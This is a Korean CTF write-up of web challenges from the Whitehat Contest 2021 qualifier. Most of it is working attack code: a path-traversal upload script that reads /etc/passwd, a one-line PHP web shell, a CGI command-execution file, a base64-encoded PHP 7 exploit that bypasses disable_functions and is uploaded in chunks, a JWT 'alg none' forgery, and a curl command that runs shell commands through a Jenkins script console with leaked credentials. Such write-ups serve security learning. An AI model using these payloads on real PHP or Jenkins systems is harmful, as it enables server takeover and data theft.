CTF/writeup
2021 화이트햇콘테스트(예선) 웹 분야 라이트업 (Whitehat Contest 2021)
ar9ang3
2021. 9. 14. 19:51
Imageflare (v1)
files = { 'file':('..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd', f, 'image/png') }
위와같이 file name을 구성함으로써 file download가 가능해진다
from arang import *
import re,sys
def dopow(x):
for i in range(0,10000000):
if hexencode(sha1(str(i)))[:5] == x:
return i
return 'false'
fname = urlencode(f"../../../../../../../../../../../../{sys.argv[1]}").replace("/","%2f")
u = 'http://imageflare-v2.eyes-on.me/index.php'
headers = {
'Cookie' : 'PHPSESSID=kbjdpdq19mrb40hqvf78ruov6e'
}
proxies = {"https":"https://127.0.0.1:8888/", "http":"http://127.0.0.1:8888/"}
r = requests.get(u, headers=headers, verify=False)
powvalue = r.content.decode().split('PoW: Solve <code>sha1(x)[:5] == ')[1].split('</code>')[0]
print(powvalue)
f = open(r"D:\jw\tmp\a.png", 'rb')
print(fname)
files = {
'file':(fname, f, 'image/png')
}
data = {"pow":dopow(powvalue.encode()), "upload":"제출"}
u = 'http://imageflare-v2.eyes-on.me/file_up.php'
r = requests.post(u, data=data, headers=headers, files=files, verify=False)
print(r.content)
u = 'http://imageflare-v2.eyes-on.me/index.php'
r = requests.get(u, headers=headers, verify=False)
rr = r.content.decode()
matches = re.findall("./download.php\\?sig=[0-9a-f]{32}\">.+</a>", rr)
for i in matches:
print(i)
sig = matches[-1].split('sig=')[1].split('"')[0]
print(sig)
r = requests.get(f"http://imageflare-v2.eyes-on.me/download.php?sig={sig}", headers=headers, verify=False)
print(r.content.decode())
File download 자동화 스크립트를 짰다
<?=`$_GET[c]`?> 가 담긴 jpg를 업로드
그러면 나타난 시그니처_파일명 이 /uploads/ 디렉터리 밑에 저장되기 때문에 직접 접근하면 쉘을 얻을 수 있다
Imageflare v2
앞부분은 v1과 동일하다
python으로 작성된 cgi파일을 ../cgi-bin/arang911.py로 업로드하였다
#!/usr/bin/python3.6
import cgi
import os
print("Content-type: text/html;\n")
print(os.popen("ls -l /").read())
print(os.popen("cat /reveeeeeeeeeeenge_flag").read())
#define width 10000
#define height 10000
#define을 통해 xbm은 image size를 parsing하기 때문에 getimagesize 우회된다. (위 사진은 xbm을 파싱하는 php 소스코드)
Realip를 알아야 cloudflare 뒷단에 직접 접근이 가능한데, 이는 Sublist3r 도구를 통해 나오는 도메인으로 알게되었다.
어쨌든 cgi로 임의 명령 실행이 가능하다
mudbox
pht가 뚫려있다
php파일 만드는 친구를 올리고 실행
맘대로 실행할수 있는 php가 생겼다
disable_functions가 걸려있으니 우회하기 위해 1day exploit을 찾아보면,
https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php 2020년에 발견된게 있다.
현재 php버전이 7.2.24니까 docker받아서 로컬테스트해보면 익스가 잘 되는것을 알 수 있다.
from arang import *
import re,sys,time
ex = urlencode('''PD9waHANCg0KcHduKCIkX0dFVFtjY2NdIik7DQoNCmZ1bmN0aW9uIHB3bigkY21kKSB7DQogICAgZ2xvYmFsICRhYmMsICRoZWxwZXIsICRiYWNrdHJhY2U7DQoNCiAgICBjbGFzcyBWdWxuIHsNCiAgICAgICAgcHVibGljICRhOw0KICAgICAgICBwdWJsaWMgZnVuY3Rpb24gX19kZXN0cnVjdCgpIHsgDQogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgDQogICAgICAgICAgICB1bnNldCgkdGhpcy0+YSk7DQogICAgICAgICAgICAkYmFja3RyYWNlID0gKG5ldyBFeGNlcHRpb24pLT5nZXRUcmFjZSgpOyANCiAgICAgICAgICAgIGlmKCFpc3NldCgkYmFja3RyYWNlWzFdWydhcmdzJ10pKSB7DQogICAgICAgICAgICAgICAgJGJhY2t0cmFjZSA9IGRlYnVnX2JhY2t0cmFjZSgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgfQ0KDQogICAgY2xhc3MgSGVscGVyIHsNCiAgICAgICAgcHVibGljICRhLCAkYiwgJGMsICRkOw0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIHN0cjJwdHIoJiRzdHIsICRwID0gMCwgJHMgPSA4KSB7DQogICAgICAgICRhZGRyZXNzID0gMDsNCiAgICAgICAgZm9yKCRqID0gJHMtMTsgJGogPj0gMDsgJGotLSkgew0KICAgICAgICAgICAgJGFkZHJlc3MgPDw9IDg7DQogICAgICAgICAgICAkYWRkcmVzcyB8PSBvcmQoJHN0clskcCskal0pOw0KICAgICAgICB9DQogICAgICAgIHJldHVybiAkYWRkcmVzczsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBwdHIyc3RyKCRwdHIsICRtID0gOCkgew0KICAgICAgICAkb3V0ID0gIiI7DQogICAgICAgIGZvciAoJGk9MDsgJGkgPCAkbTsgJGkrKykgew0KICAgICAgICAgICAgJG91dCAuPSBjaHIoJHB0ciAmIDB4ZmYpOw0KICAgICAgICAgICAgJHB0ciA+Pj0gODsNCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gJG91dDsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiB3cml0ZSgmJHN0ciwgJHAsICR2LCAkbiA9IDgpIHsNCiAgICAgICAgJGkgPSAwOw0KICAgICAgICBmb3IoJGkgPSAwOyAkaSA8ICRuOyAkaSsrKSB7DQogICAgICAgICAgICAkc3RyWyRwICsgJGldID0gY2hyKCR2ICYgMHhmZik7DQogICAgICAgICAgICAkdiA+Pj0gODsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGxlYWsoJGFkZHIsICRwID0gMCwgJHMgPSA4KSB7DQogICAgICAgIGdsb2JhbCAkYWJjLCAkaGVscGVyOw0KICAgICAgICB3cml0ZSgkYWJjLCAweDY4LCAkYWRkciArICRwIC0gMHgxMCk7DQogICAgICAgICRsZWFrID0gc3RybGVuKCRoZWxwZXItPmEpOw0KICAgICAgICBpZigkcyAhPSA4KSB7ICRsZWFrICU9IDIgPDwgKCRzICogOCkgLSAxOyB9DQogICAgICAgIHJldHVybiAkbGVhazsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBwYXJzZV9lbGYoJGJhc2UpIHsNCiAgICAgICAgJGVfdHlwZSA9IGxlYWsoJGJhc2UsIDB4MTAsIDIpOw0KDQogICAgICAgICRlX3Bob2ZmID0gbGVhaygkYmFzZSwgMHgyMCk7DQogICAgICAgICRlX3BoZW50c2l6ZSA9IGxlYWsoJGJhc2UsIDB4MzYsIDIpOw0KICAgICAgICAkZV9waG51bSA9IGxlYWsoJGJhc2UsIDB4MzgsIDIpOw0KDQogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgJGVfcGhudW07ICRpKyspIHsNCiAgICAgICAgICAgICRoZWFkZXIgPSAkYmFzZSArICRlX3Bob2ZmICsgJGkgKiAkZV9waGVudHNpemU7DQogICAgICAgICAgICAkcF90eXBlICA9IGxlYWsoJGhlYWRlciwgMCwgNCk7DQogICAgICAgICAgICAkcF9mbGFncyA9IGxlYWsoJGhlYWRlciwgNCwgNCk7DQogICAgICAgICAgICAkcF92YWRkciA9IGxlYWsoJGhlYWRlciwgMHgxMCk7DQogICAgICAgICAgICAkcF9tZW1zeiA9IGxlYWsoJGhlYWRlciwgMHgyOCk7DQoNCiAgICAgICAgICAgIGlmKCRwX3R5cGUgPT0gMSAmJiAkcF9mbGFncyA9PSA2KSB7IA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRkYXRhX2FkZHIgPSAkZV90eXBlID09IDIgPyAkcF92YWRkciA6ICRiYXNlICsgJHBfdmFkZHI7DQogICAgICAgICAgICAgICAgJGRhdGFfc2l6ZSA9ICRwX21lbXN6Ow0KICAgICAgICAgICAgfSBlbHNlIGlmKCRwX3R5cGUgPT0gMSAmJiAkcF9mbGFncyA9PSA1KSB7IA0KICAgICAgICAgICAgICAgICR0ZXh0X3NpemUgPSAkcF9tZW1zejsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KDQogICAgICAgIGlmKCEkZGF0YV9hZGRyIHx8ICEkdGV4dF9zaXplIHx8ICEkZGF0YV9zaXplKQ0KICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0KDQogICAgICAgIHJldHVybiBbJGRhdGFfYWRkciwgJHRleHRfc2l6ZSwgJGRhdGFfc2l6ZV07DQogICAgfQ0KDQogICAgZnVuY3Rpb24gZ2V0X2Jhc2ljX2Z1bmNzKCRiYXNlLCAkZWxmKSB7DQogICAgICAgIGxpc3QoJGRhdGFfYWRkciwgJHRleHRfc2l6ZSwgJGRhdGFfc2l6ZSkgPSAkZWxmOw0KICAgICAgICBmb3IoJGkgPSAwOyAkaSA8ICRkYXRhX3NpemUgLyA4OyAkaSsrKSB7DQogICAgICAgICAgICAkbGVhayA9IGxlYWsoJGRhdGFfYWRkciwgJGkgKiA4KTsNCiAgICAgICAgICAgIGlmKCRsZWFrIC0gJGJhc2UgPiAwICYmICRsZWFrIC0gJGJhc2UgPCAkZGF0YV9hZGRyIC0gJGJhc2UpIHsNCiAgICAgICAgICAgICAgICAkZGVyZWYgPSBsZWFrKCRsZWFrKTsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBpZigkZGVyZWYgIT0gMHg3NDZlNjE3NDczNmU2ZjYzKQ0KICAgICAgICAgICAgICAgICAgICBjb250aW51ZTsNCiAgICAgICAgICAgIH0gZWxzZSBjb250aW51ZTsNCg0KICAgICAgICAgICAgJGxlYWsgPSBsZWFrKCRkYXRhX2FkZHIsICgkaSArIDQpICogOCk7DQogICAgICAgICAgICBpZigkbGVhayAtICRiYXNlID4gMCAmJiAkbGVhayAtICRiYXNlIDwgJGRhdGFfYWRkciAtICRiYXNlKSB7DQogICAgICAgICAgICAgICAgJGRlcmVmID0gbGVhaygkbGVhayk7DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgaWYoJGRlcmVmICE9IDB4Nzg2NTY4MzI2ZTY5NjIpDQogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlOw0KICAgICAgICAgICAgfSBlbHNlIGNvbnRpbnVlOw0KDQogICAgICAgICAgICByZXR1cm4gJGRhdGFfYWRkciArICRpICogODsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGdldF9iaW5hcnlfYmFzZSgkYmluYXJ5X2xlYWspIHsNCiAgICAgICAgJGJhc2UgPSAwOw0KICAgICAgICAkc3RhcnQgPSAkYmluYXJ5X2xlYWsgJiAweGZmZmZmZmZmZmZmZmYwMDA7DQogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgMHgxMDAwOyAkaSsrKSB7DQogICAgICAgICAgICAkYWRkciA9ICRzdGFydCAtIDB4MTAwMCAqICRpOw0KICAgICAgICAgICAgJGxlYWsgPSBsZWFrKCRhZGRyLCAwLCA3KTsNCiAgICAgICAgICAgIGlmKCRsZWFrID09IDB4MTAxMDI0NjRjNDU3ZikgeyANCiAgICAgICAgICAgICAgICByZXR1cm4gJGFkZHI7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoNCiAgICBmdW5jdGlvbiBnZXRfc3lzdGVtKCRiYXNpY19mdW5jcykgew0KICAgICAgICAkYWRkciA9ICRiYXNpY19mdW5jczsNCiAgICAgICAgZG8gew0KICAgICAgICAgICAgJGZfZW50cnkgPSBsZWFrKCRhZGRyKTsNCiAgICAgICAgICAgICRmX25hbWUgPSBsZWFrKCRmX2VudHJ5LCAwLCA2KTsNCg0KICAgICAgICAgICAgaWYoJGZfbmFtZSA9PSAweDZkNjU3NDczNzk3MykgeyANCiAgICAgICAgICAgICAgICByZXR1cm4gbGVhaygkYWRkciArIDgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgJGFkZHIgKz0gMHgyMDsNCiAgICAgICAgfSB3aGlsZSgkZl9lbnRyeSAhPSAwKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIHRyaWdnZXJfdWFmKCRhcmcpIHsNCiAgICAgICAgDQogICAgICAgICRhcmcgPSBzdHJfc2h1ZmZsZShzdHJfcmVwZWF0KCdBJywgNzkpKTsNCiAgICAgICAgJHZ1bG4gPSBuZXcgVnVsbigpOw0KICAgICAgICAkdnVsbi0+YSA9ICRhcmc7DQogICAgfQ0KDQogICAgaWYoc3RyaXN0cihQSFBfT1MsICdXSU4nKSkgew0KICAgICAgICBkaWUoJ1RoaXMgUG9DIGlzIGZvciAqbml4IHN5c3RlbXMgb25seS4nKTsNCiAgICB9DQoNCiAgICAkbl9hbGxvYyA9IDEwOyANCiAgICAkY29udGlndW91cyA9IFtdOw0KICAgIGZvcigkaSA9IDA7ICRpIDwgJG5fYWxsb2M7ICRpKyspDQogICAgICAgICRjb250aWd1b3VzW10gPSBzdHJfc2h1ZmZsZShzdHJfcmVwZWF0KCdBJywgNzkpKTsNCg0KICAgIHRyaWdnZXJfdWFmKCd4Jyk7DQogICAgJGFiYyA9ICRiYWNrdHJhY2VbMV1bJ2FyZ3MnXVswXTsNCg0KICAgICRoZWxwZXIgPSBuZXcgSGVscGVyOw0KICAgICRoZWxwZXItPmIgPSBmdW5jdGlvbiAoJHgpIHsgfTsNCg0KICAgIGlmKHN0cmxlbigkYWJjKSA9PSA3OSB8fCBzdHJsZW4oJGFiYykgPT0gMCkgew0KICAgICAgICBkaWUoIlVBRiBmYWlsZWQiKTsNCiAgICB9DQoNCiAgICANCiAgICAkY2xvc3VyZV9oYW5kbGVycyA9IHN0cjJwdHIoJGFiYywgMCk7DQogICAgJHBocF9oZWFwID0gc3RyMnB0cigkYWJjLCAweDU4KTsNCiAgICAkYWJjX2FkZHIgPSAkcGhwX2hlYXAgLSAweGM4Ow0KDQogICAgDQogICAgd3JpdGUoJGFiYywgMHg2MCwgMik7DQogICAgd3JpdGUoJGFiYywgMHg3MCwgNik7DQoNCiAgICANCiAgICB3cml0ZSgkYWJjLCAweDEwLCAkYWJjX2FkZHIgKyAweDYwKTsNCiAgICB3cml0ZSgkYWJjLCAweDE4LCAweGEpOw0KDQogICAgJGNsb3N1cmVfb2JqID0gc3RyMnB0cigkYWJjLCAweDIwKTsNCg0KICAgICRiaW5hcnlfbGVhayA9IGxlYWsoJGNsb3N1cmVfaGFuZGxlcnMsIDgpOw0KICAgIGlmKCEoJGJhc2UgPSBnZXRfYmluYXJ5X2Jhc2UoJGJpbmFyeV9sZWFrKSkpIHsNCiAgICAgICAgZGllKCJDb3VsZG4ndCBkZXRlcm1pbmUgYmluYXJ5IGJhc2UgYWRkcmVzcyIpOw0KICAgIH0NCg0KICAgIGlmKCEoJGVsZiA9IHBhcnNlX2VsZigkYmFzZSkpKSB7DQogICAgICAgIGRpZSgiQ291bGRuJ3QgcGFyc2UgRUxGIGhlYWRlciIpOw0KICAgIH0NCg0KICAgIGlmKCEoJGJhc2ljX2Z1bmNzID0gZ2V0X2Jhc2ljX2Z1bmNzKCRiYXNlLCAkZWxmKSkpIHsNCiAgICAgICAgZGllKCJDb3VsZG4ndCBnZXQgYmFzaWNfZnVuY3Rpb25zIGFkZHJlc3MiKTsNCiAgICB9DQoNCiAgICBpZighKCR6aWZfc3lzdGVtID0gZ2V0X3N5c3RlbSgkYmFzaWNfZnVuY3MpKSkgew0KICAgICAgICBkaWUoIkNvdWxkbid0IGdldCB6aWZfc3lzdGVtIGFkZHJlc3MiKTsNCiAgICB9DQoNCiAgICANCiAgICAkZmFrZV9vYmpfb2Zmc2V0ID0gMHhkMDsNCiAgICBmb3IoJGkgPSAwOyAkaSA8IDB4MTEwOyAkaSArPSA4KSB7DQogICAgICAgIHdyaXRlKCRhYmMsICRmYWtlX29ial9vZmZzZXQgKyAkaSwgbGVhaygkY2xvc3VyZV9vYmosICRpKSk7DQogICAgfQ0KDQogICAgDQogICAgd3JpdGUoJGFiYywgMHgyMCwgJGFiY19hZGRyICsgJGZha2Vfb2JqX29mZnNldCk7DQogICAgd3JpdGUoJGFiYywgMHhkMCArIDB4MzgsIDEsIDQpOyANCiAgICB3cml0ZSgkYWJjLCAweGQwICsgMHg2OCwgJHppZl9zeXN0ZW0pOyANCg0KICAgICgkaGVscGVyLT5iKSgkY21kKTsNCiAgICBleGl0KCk7DQp9''')
u = 'http://3.38.109.135:28344/data/72ced1fa15db322c3c900cba8f15cf46/test.php?c=echo%20file_put_contents(%27/tmp/arang101%27,file_get_contents(%27/tmp/arang101%27)."{}");'
for i in range(0,len(ex),1000):
r = requests.get(u.format(ex[i:i+1000]))
time.sleep(1)대강 서버에 업로드 한 후
file_put_contents("ex.php",str_replace("\r\n","\n",base64_decode(file_get_contents("/tmp/arang101"))));이런식으로 현재경로로 익스코드를 가져온다
이후 접근하면
웹쉘 업로드 가능
mini-realworld
첨에는 제공된 react 코드좀 보다가 무지성 algo none 바꿔치기 했는데 로그인이 되어버렸다.
Nickname인 Whitehat-NowYouSeeMe를 github에 검색해봤다.
ㄷㄷㄷ
ㄷㄷㄷㄷㄷㄷㄷ
s3cret ㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷ
젠킨스 ㄷㄷㄷㄷㄷㄷ 9999 ㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷ
찐킨스 9999포트 ㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷ
key와 아까 얻은 nickname으로 remote access해보면 결과가 잘 나온다.
https://beaglesecurity.com/blog/domectf2020/timezone-writeup.html
https://www.jenkins.io/doc/book/managing/script-console/
https://stackoverflow.com/questions/159148/groovy-executing-shell-commands
위에거 링크들 참조해서 했다
/script에 우선 접근 후 script run 날렸을때 실제 날아가는 패킷 잡아서 변조했다.
curl --data "script=def+proc+%3D+%22ls -alR /%22.execute%28%29%0D%0Adef+b+%3D+new+StringBuffer%28%29%0D%0Aproc.consumeProcessErrorStream%28b%29%0D%0A%0D%0Aprintln+proc.text%0D%0Aprintln+b.toString%28%29&Jenkins-Crumb=3aa12ac3ad49ab60ee63b3fdf4d5ba4d4978eacfb5785753ff0fb6fa69a4ba3c&json=%7B%22script%22%3A+%22def+proc+%3D+%5C%22ls+-al+%2F%5C%22.execute%28%29%5Cndef+b+%3D+new+StringBuffer%28%29%5Cnproc.consumeProcessErrorStream%28b%29%5Cn%5Cnprintln+proc.text%5Cnprintln+b.toString%28%29%22%2C+%22%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%223aa12ac3ad49ab60ee63b3fdf4d5ba4d4978eacfb5785753ff0fb6fa69a4ba3c%22%7D&Submit=Run" -X POST http://Whitehat-NowYouSeeMe:11d5eb71408ae9b0e4a6219ce9a4aa1767@3.37.166.114:9999/script -i > out.txt;cat out.txt|grep FLAG -B5 -A5
플래그 획득